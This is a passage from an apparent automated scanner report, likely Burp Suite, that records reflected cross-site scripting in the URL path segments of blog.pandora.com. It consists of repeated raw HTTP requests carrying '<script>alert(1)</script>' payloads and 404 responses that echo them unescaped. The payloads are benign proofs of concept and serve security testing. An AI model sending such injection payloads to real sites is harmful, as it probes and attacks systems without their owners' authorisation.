GET /pandora/archives25bf5<script>alert(1)</script>3d971d76d88/2008/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:45 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives25bf5<script>alert(1)</script>3d971d76d88/2008/08/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5abe6<script>alert(1)</script>db42742e74 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20085abe6<script>alert(1)</script>db42742e74/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:47 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 348
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20085abe6<script>alert(1)</script>db42742e74/08/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 70934<script>alert(1)</script>e46d04bff1b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/0870934<script>alert(1)</script>e46d04bff1b/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:51 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/0870934<script>alert(1)</script>e46d04bff1b/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ac95c<script>alert(1)</script>f39701078da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraac95c<script>alert(1)</script>f39701078da/archives/2008/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraac95c<script>alert(1)</script>f39701078da/archives/2008/09/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload eb2c5<script>alert(1)</script>2ae1ae68fdb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archiveseb2c5<script>alert(1)</script>2ae1ae68fdb/2008/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archiveseb2c5<script>alert(1)</script>2ae1ae68fdb/2008/09/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e57ea<script>alert(1)</script>aa701cd74e3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008e57ea<script>alert(1)</script>aa701cd74e3/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:01 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008e57ea<script>alert(1)</script>aa701cd74e3/09/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 500d6<script>alert(1)</script>b55ef145dcc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/09500d6<script>alert(1)</script>b55ef145dcc/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:04 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/09500d6<script>alert(1)</script>b55ef145dcc/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 872c8<script>alert(1)</script>e32ca06f3d3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora872c8<script>alert(1)</script>e32ca06f3d3/archives/2008/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:48 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora872c8<script>alert(1)</script>e32ca06f3d3/archives/2008/10/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 69a72<script>alert(1)</script>b4e2002f078 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives69a72<script>alert(1)</script>b4e2002f078/2008/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:53 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives69a72<script>alert(1)</script>b4e2002f078/2008/10/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c1a34<script>alert(1)</script>3e603248071 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008c1a34<script>alert(1)</script>3e603248071/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008c1a34<script>alert(1)</script>3e603248071/10/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ef2f7<script>alert(1)</script>b77f6aa2ff0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/10ef2f7<script>alert(1)</script>b77f6aa2ff0/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:02 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/10ef2f7<script>alert(1)</script>b77f6aa2ff0/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 685f7<script>alert(1)</script>b71e5ef0a26 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora685f7<script>alert(1)</script>b71e5ef0a26/archives/2008/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora685f7<script>alert(1)</script>b71e5ef0a26/archives/2008/11/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bce64<script>alert(1)</script>e78182be82 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesbce64<script>alert(1)</script>e78182be82/2008/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:59 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 348

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesbce64<script>alert(1)</script>e78182be82/2008/11/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6e4b2<script>alert(1)</script>1ff330e9b26 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20086e4b2<script>alert(1)</script>1ff330e9b26/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:04 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20086e4b2<script>alert(1)</script>1ff330e9b26/11/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3a15c<script>alert(1)</script>5c048a41cfa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/113a15c<script>alert(1)</script>5c048a41cfa/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:09 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/113a15c<script>alert(1)</script>5c048a41cfa/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8089c<script>alert(1)</script>6c11535c8eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora8089c<script>alert(1)</script>6c11535c8eb/archives/2008/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:37 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora8089c<script>alert(1)</script>6c11535c8eb/archives/2008/12/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7be86<script>alert(1)</script>858dc5f1838 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives7be86<script>alert(1)</script>858dc5f1838/2008/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:39 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives7be86<script>alert(1)</script>858dc5f1838/2008/12/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9cdec<script>alert(1)</script>3afc3bd0abd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20089cdec<script>alert(1)</script>3afc3bd0abd/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:42 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20089cdec<script>alert(1)</script>3afc3bd0abd/12/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6330d<script>alert(1)</script>5cbccb3c131 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/126330d<script>alert(1)</script>5cbccb3c131/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:45 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/126330d<script>alert(1)</script>5cbccb3c131/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9e242<script>alert(1)</script>c3f15fa67f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora9e242<script>alert(1)</script>c3f15fa67f4/archives/2009/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
